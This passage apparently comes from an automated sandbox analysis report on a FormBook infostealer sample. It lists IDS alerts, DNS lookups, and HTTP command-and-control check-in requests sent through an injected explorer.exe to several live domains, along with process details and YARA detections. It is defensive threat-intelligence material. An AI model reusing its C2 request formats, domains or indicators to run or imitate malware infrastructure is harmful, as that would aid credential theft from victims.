                                                    01/28/22-21:00:09.463600TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982180192.168.2.334.102.136.180
                                                    01/28/22-21:00:09.463600TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982180192.168.2.334.102.136.180
                                                    01/28/22-21:00:09.578330TCP1201ATTACK-RESPONSES 403 Forbidden804982134.102.136.180192.168.2.3

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 28, 2022 20:59:42.798983097 CET4981680192.168.2.3166.88.62.202
                                                    Jan 28, 2022 20:59:42.965682030 CET8049816166.88.62.202192.168.2.3
                                                    Jan 28, 2022 20:59:42.965822935 CET4981680192.168.2.3166.88.62.202
                                                    Jan 28, 2022 20:59:42.965996981 CET4981680192.168.2.3166.88.62.202
                                                    Jan 28, 2022 20:59:43.132395983 CET8049816166.88.62.202192.168.2.3
                                                    Jan 28, 2022 20:59:43.132538080 CET8049816166.88.62.202192.168.2.3
                                                    Jan 28, 2022 20:59:43.132555962 CET8049816166.88.62.202192.168.2.3
                                                    Jan 28, 2022 20:59:43.132710934 CET4981680192.168.2.3166.88.62.202
                                                    Jan 28, 2022 20:59:43.132930994 CET4981680192.168.2.3166.88.62.202
                                                    Jan 28, 2022 20:59:43.299249887 CET8049816166.88.62.202192.168.2.3
                                                    Jan 28, 2022 20:59:48.170636892 CET4981780192.168.2.3199.59.243.200
                                                    Jan 28, 2022 20:59:48.188353062 CET8049817199.59.243.200192.168.2.3
                                                    Jan 28, 2022 20:59:48.188462973 CET4981780192.168.2.3199.59.243.200
                                                    Jan 28, 2022 20:59:48.188611984 CET4981780192.168.2.3199.59.243.200
                                                    Jan 28, 2022 20:59:48.206522942 CET8049817199.59.243.200192.168.2.3
                                                    Jan 28, 2022 20:59:48.386589050 CET8049817199.59.243.200192.168.2.3
                                                    Jan 28, 2022 20:59:48.386617899 CET8049817199.59.243.200192.168.2.3
                                                    Jan 28, 2022 20:59:48.386630058 CET8049817199.59.243.200192.168.2.3
                                                    Jan 28, 2022 20:59:48.386801958 CET4981780192.168.2.3199.59.243.200
                                                    Jan 28, 2022 20:59:48.386905909 CET4981780192.168.2.3199.59.243.200
                                                    Jan 28, 2022 20:59:48.404725075 CET8049817199.59.243.200192.168.2.3
                                                    Jan 28, 2022 20:59:53.420916080 CET4981980192.168.2.334.102.136.180
                                                    Jan 28, 2022 20:59:53.439260006 CET804981934.102.136.180192.168.2.3
                                                    Jan 28, 2022 20:59:53.439475060 CET4981980192.168.2.334.102.136.180
                                                    Jan 28, 2022 20:59:53.439712048 CET4981980192.168.2.334.102.136.180
                                                    Jan 28, 2022 20:59:53.457967043 CET804981934.102.136.180192.168.2.3
                                                    Jan 28, 2022 20:59:53.555000067 CET804981934.102.136.180192.168.2.3
                                                    Jan 28, 2022 20:59:53.555032969 CET804981934.102.136.180192.168.2.3
                                                    Jan 28, 2022 20:59:53.555290937 CET4981980192.168.2.334.102.136.180
                                                    Jan 28, 2022 20:59:53.555388927 CET4981980192.168.2.334.102.136.180
                                                    Jan 28, 2022 20:59:53.859774113 CET4981980192.168.2.334.102.136.180
                                                    Jan 28, 2022 20:59:53.878108025 CET804981934.102.136.180192.168.2.3
                                                    Jan 28, 2022 20:59:58.644171000 CET4982080192.168.2.318.231.72.25
                                                    Jan 28, 2022 20:59:58.877240896 CET804982018.231.72.25192.168.2.3
                                                    Jan 28, 2022 20:59:58.879684925 CET4982080192.168.2.318.231.72.25
                                                    Jan 28, 2022 20:59:59.099003077 CET4982080192.168.2.318.231.72.25
                                                    Jan 28, 2022 20:59:59.332000017 CET804982018.231.72.25192.168.2.3
                                                    Jan 28, 2022 20:59:59.332036972 CET804982018.231.72.25192.168.2.3
                                                    Jan 28, 2022 20:59:59.332056046 CET804982018.231.72.25192.168.2.3
                                                    Jan 28, 2022 20:59:59.332253933 CET4982080192.168.2.318.231.72.25
                                                    Jan 28, 2022 20:59:59.332340002 CET4982080192.168.2.318.231.72.25
                                                    Jan 28, 2022 20:59:59.565438032 CET804982018.231.72.25192.168.2.3
                                                    Jan 28, 2022 21:00:09.447079897 CET4982180192.168.2.334.102.136.180
                                                    Jan 28, 2022 21:00:09.463361025 CET804982134.102.136.180192.168.2.3
                                                    Jan 28, 2022 21:00:09.463465929 CET4982180192.168.2.334.102.136.180
                                                    Jan 28, 2022 21:00:09.463599920 CET4982180192.168.2.334.102.136.180
                                                    Jan 28, 2022 21:00:09.479799986 CET804982134.102.136.180192.168.2.3
                                                    Jan 28, 2022 21:00:09.578330040 CET804982134.102.136.180192.168.2.3
                                                    Jan 28, 2022 21:00:09.578351974 CET804982134.102.136.180192.168.2.3
                                                    Jan 28, 2022 21:00:09.578561068 CET4982180192.168.2.334.102.136.180
                                                    Jan 28, 2022 21:00:09.578629971 CET4982180192.168.2.334.102.136.180
                                                    Jan 28, 2022 21:00:09.876754999 CET4982180192.168.2.334.102.136.180
                                                    Jan 28, 2022 21:00:09.895001888 CET804982134.102.136.180192.168.2.3
                                                    Jan 28, 2022 21:00:14.659136057 CET4982280192.168.2.346.252.151.235
                                                    Jan 28, 2022 21:00:17.671350956 CET4982280192.168.2.346.252.151.235
                                                    Jan 28, 2022 21:00:23.671860933 CET4982280192.168.2.346.252.151.235

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 28, 2022 20:59:42.674398899 CET5265053192.168.2.38.8.8.8
                                                    Jan 28, 2022 20:59:42.790488005 CET53526508.8.8.8192.168.2.3
                                                    Jan 28, 2022 20:59:48.145526886 CET6329753192.168.2.38.8.8.8
                                                    Jan 28, 2022 20:59:48.169529915 CET53632978.8.8.8192.168.2.3
                                                    Jan 28, 2022 20:59:53.396126986 CET5361553192.168.2.38.8.8.8
                                                    Jan 28, 2022 20:59:53.419476032 CET53536158.8.8.8192.168.2.3
                                                    Jan 28, 2022 20:59:58.609788895 CET5072853192.168.2.38.8.8.8
                                                    Jan 28, 2022 20:59:58.638331890 CET53507288.8.8.8192.168.2.3
                                                    Jan 28, 2022 21:00:04.353455067 CET5377753192.168.2.38.8.8.8
                                                    Jan 28, 2022 21:00:04.394292116 CET53537778.8.8.8192.168.2.3
                                                    Jan 28, 2022 21:00:09.424981117 CET5710653192.168.2.38.8.8.8
                                                    Jan 28, 2022 21:00:09.445676088 CET53571068.8.8.8192.168.2.3
                                                    Jan 28, 2022 21:00:14.622612000 CET6035253192.168.2.38.8.8.8
                                                    Jan 28, 2022 21:00:14.657841921 CET53603528.8.8.8192.168.2.3

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                    Jan 28, 2022 20:59:42.674398899 CET192.168.2.38.8.8.80x48c8Standard query (0)www.experiencedlawfirms.comA (IP address)IN (0x0001)
                                                    Jan 28, 2022 20:59:48.145526886 CET192.168.2.38.8.8.80xf74dStandard query (0)www.totalwinerewards.comA (IP address)IN (0x0001)
                                                    Jan 28, 2022 20:59:53.396126986 CET192.168.2.38.8.8.80x2129Standard query (0)www.casatowerofficial.comA (IP address)IN (0x0001)
                                                    Jan 28, 2022 20:59:58.609788895 CET192.168.2.38.8.8.80x2e9bStandard query (0)www.bitconga.comA (IP address)IN (0x0001)
                                                    Jan 28, 2022 21:00:04.353455067 CET192.168.2.38.8.8.80x72a8Standard query (0)www.tothelaundry.comA (IP address)IN (0x0001)
                                                    Jan 28, 2022 21:00:09.424981117 CET192.168.2.38.8.8.80x5eafStandard query (0)www.omnipets.storeA (IP address)IN (0x0001)
                                                    Jan 28, 2022 21:00:14.622612000 CET192.168.2.38.8.8.80xe911Standard query (0)www.webarate.comA (IP address)IN (0x0001)

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                    Jan 28, 2022 20:59:42.790488005 CET8.8.8.8192.168.2.30x48c8No error (0)www.experiencedlawfirms.com166.88.62.202A (IP address)IN (0x0001)
                                                    Jan 28, 2022 20:59:48.169529915 CET8.8.8.8192.168.2.30xf74dNo error (0)www.totalwinerewards.com199.59.243.200A (IP address)IN (0x0001)
                                                    Jan 28, 2022 20:59:53.419476032 CET8.8.8.8192.168.2.30x2129No error (0)www.casatowerofficial.comcasatowerofficial.comCNAME (Canonical name)IN (0x0001)
                                                    Jan 28, 2022 20:59:53.419476032 CET8.8.8.8192.168.2.30x2129No error (0)casatowerofficial.com34.102.136.180A (IP address)IN (0x0001)
                                                    Jan 28, 2022 20:59:58.638331890 CET8.8.8.8192.168.2.30x2e9bNo error (0)www.bitconga.com18.231.72.25A (IP address)IN (0x0001)
                                                    Jan 28, 2022 21:00:04.394292116 CET8.8.8.8192.168.2.30x72a8Name error (3)www.tothelaundry.comnonenoneA (IP address)IN (0x0001)
                                                    Jan 28, 2022 21:00:09.445676088 CET8.8.8.8192.168.2.30x5eafNo error (0)www.omnipets.storeomnipets.storeCNAME (Canonical name)IN (0x0001)
                                                    Jan 28, 2022 21:00:09.445676088 CET8.8.8.8192.168.2.30x5eafNo error (0)omnipets.store34.102.136.180A (IP address)IN (0x0001)
                                                    Jan 28, 2022 21:00:14.657841921 CET8.8.8.8192.168.2.30xe911No error (0)www.webarate.comwebarate.comCNAME (Canonical name)IN (0x0001)
                                                    Jan 28, 2022 21:00:14.657841921 CET8.8.8.8192.168.2.30xe911No error (0)webarate.com46.252.151.235A (IP address)IN (0x0001)

                                                    HTTP Request Dependency Graph

                                                    • www.experiencedlawfirms.com
                                                    • www.totalwinerewards.com
                                                    • www.casatowerofficial.com
                                                    • www.bitconga.com
                                                    • www.omnipets.store

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    0192.168.2.349816166.88.62.20280C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 28, 2022 20:59:42.965996981 CET9880OUTGET /cbgo/?Xf3=7nL8&4hPx=7Chnk+6aZrnZKD5hPI2GMOI+n7dvSwdfhhGQh0Quh+scZbPipDWGAiRMNWcFVsP/HL+E HTTP/1.1
                                                    Host: www.experiencedlawfirms.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 28, 2022 20:59:43.132538080 CET9881INHTTP/1.1 302 Moved Temporarily
                                                    Date: Fri, 28 Jan 2022 19:59:41 GMT
                                                    Connection: close
                                                    Content-Length: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    Cache-Control: private, no-cache, no-store, max-age=0
                                                    Expires: Mon, 01 Jan 1990 0:00:00 GMT
                                                    Location: https://www.dynadot.com/forsale/experiencedlawfirms.com?drefid=2071


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    1192.168.2.349817199.59.243.20080C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 28, 2022 20:59:48.188611984 CET9882OUTGET /cbgo/?4hPx=1bX869aeBvRpB8efE68exBqREj8ZtAjUgPjKFGRzRfZzNr9ae7mwrEXk0/ZD8RpqTQtr&Xf3=7nL8 HTTP/1.1
                                                    Host: www.totalwinerewards.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 28, 2022 20:59:48.386589050 CET9883INHTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Fri, 28 Jan 2022 19:59:48 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: parking_session=915ee359-eb6f-27d3-758c-9b4148d69bcd; expires=Fri, 28-Jan-2022 20:14:48 GMT; Max-Age=900; path=/; HttpOnly
                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_YiK60Qco7iKrEoYb629f/pqFNNxNMwpqSwbmJjBGxbwL67qPTHjuiYjl+re72XQaOdlZyuLDY5NjvdcCv8Qk9g==
                                                    Cache-Control: no-cache
                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                    Cache-Control: no-store, must-revalidate
                                                    Cache-Control: post-check=0, pre-check=0
                                                    Pragma: no-cache
                                                    Data Raw: 35 38 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 59 69 4b 36 30 51 63 6f 37 69 4b 72 45 6f 59 62 36 32 39 66 2f 70 71 46 4e 4e 78 4e 4d 77 70 71 53 77 62 6d 4a 6a 42 47 78 62 77 4c 36 37 71 50 54 48 6a 75 69 59 6a 6c 2b 72 65 37 32 58 51 61 4f 64 6c 5a 79 75 4c 44 59 35 4e 6a 76 64 63 43 76 38 51 6b 39 67 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c
                                                    Data Ascii: 589<!doctype html><html lang="en" data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_YiK60Qco7iKrEoYb629f/pqFNNxNMwpqSwbmJjBGxbwL67qPTHjuiYjl+re72XQaOdlZyuLDY5NjvdcCv8Qk9g=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="shortcut icon" href="/favicon.ico" type="image/x-icon"/><link rel="preconnect" href="https://www.google.com" crossorigin><


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    2192.168.2.34981934.102.136.18080C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 28, 2022 20:59:53.439712048 CET9894OUTGET /cbgo/?Xf3=7nL8&4hPx=EmDZCHQOcI1nLFjwZeeYVuMSiom2MDKGDS/zESQUEEY6NQpaRm0dZ/ZfJs3HzPw+5Ylf HTTP/1.1
                                                    Host: www.casatowerofficial.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 28, 2022 20:59:53.555000067 CET9894INHTTP/1.1 403 Forbidden
                                                    Server: openresty
                                                    Date: Fri, 28 Jan 2022 19:59:53 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 275
                                                    ETag: "61f22041-113"
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    3192.168.2.34982018.231.72.2580C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 28, 2022 20:59:59.099003077 CET9895OUTGET /cbgo/?4hPx=dYuxO3siHqLtebwjMrcX5kx68cWjYzK43o/BCbb09yTbLvpXET1fm3yQPY7Ys1RTSltw&Xf3=7nL8 HTTP/1.1
                                                    Host: www.bitconga.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 28, 2022 20:59:59.332036972 CET9896INHTTP/1.1 301 Moved Permanently
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Fri, 28 Jan 2022 19:59:59 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 178
                                                    Connection: close
                                                    Location: https://www.bitconga.com/cbgo/?4hPx=dYuxO3siHqLtebwjMrcX5kx68cWjYzK43o/BCbb09yTbLvpXET1fm3yQPY7Ys1RTSltw&Xf3=7nL8
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    4192.168.2.34982134.102.136.18080C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 28, 2022 21:00:09.463599920 CET9897OUTGET /cbgo/?4hPx=t6byCRjNUQvGMW438Oj8n0b0Tq5DbL5JR7oEbxqA77YwnlkkuyfhzykLt/IStXAvHe2n&Xf3=7nL8 HTTP/1.1
                                                    Host: www.omnipets.store
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 28, 2022 21:00:09.578330040 CET9897INHTTP/1.1 403 Forbidden
                                                    Server: openresty
                                                    Date: Fri, 28 Jan 2022 20:00:09 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 275
                                                    ETag: "61f22041-113"
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                    Statistics

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:20:58:13
                                                    Start date:28/01/2022
                                                    Path:C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe"
                                                    Imagebase:0x590000
                                                    File size:391680 bytes
                                                    MD5 hash:CF6D4FD3DC8E4751B7F89F857B618EF3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.345998808.0000000002965000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low

                                                    General

                                                    Target ID:3
                                                    Start time:20:58:34
                                                    Start date:28/01/2022
                                                    Path:C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe
                                                    Imagebase:0xd80000
                                                    File size:391680 bytes
                                                    MD5 hash:CF6D4FD3DC8E4751B7F89F857B618EF3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    General

                                                    Target ID:5
                                                    Start time:20:58:37
                                                    Start date:28/01/2022
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\Explorer.EXE
                                                    Imagebase:0x7ff720ea0000
                                                    File size:3933184 bytes
                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:high

                                                    General

                                                    Target ID:10
                                                    Start time:20:59:02
                                                    Start date:28/01/2022
                                                    Path:C:\Windows\SysWOW64\chkdsk.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\chkdsk.exe
                                                    Imagebase:0x90000
                                                    File size:23040 bytes
                                                    MD5 hash:2D5A2497CB57C374B3AE3080FF9186FB
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
